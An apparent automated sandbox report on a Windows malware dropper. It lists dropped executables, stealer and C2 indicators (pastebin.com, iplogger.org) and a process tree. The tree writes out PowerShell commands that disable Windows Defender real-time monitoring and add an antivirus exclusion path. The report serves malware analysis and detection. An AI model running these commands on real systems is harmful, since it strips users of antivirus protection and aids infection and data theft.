N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 5032 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 5032 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3636 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe
PID 3636 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe
PID 3636 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe
PID 3516 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3684 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3684 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3684 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3516 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4528 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe
PID 4528 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe
PID 2404 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
PID 2404 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
PID 2404 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
PID 1652 wrote to memory of 3780 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
PID 1652 wrote to memory of 3780 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
PID 1652 wrote to memory of 3780 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
PID 316 wrote to memory of 744 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe
PID 316 wrote to memory of 744 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe

"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed096e68af113.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe

Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3516 -ip 3516

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe

Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe

Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe

Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe

Wed094d15aaa9a48.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe

Wed0911cd5800a45.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe

Wed098e48a54663552b.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe

Wed09a6fb1d0dd846.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe

Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe

Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe

Wed0961d5d40c7b937c7.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe

Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 540 -ip 540

C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80260,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 536

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 356

C:\Windows\SysWOW64\mshta.exe

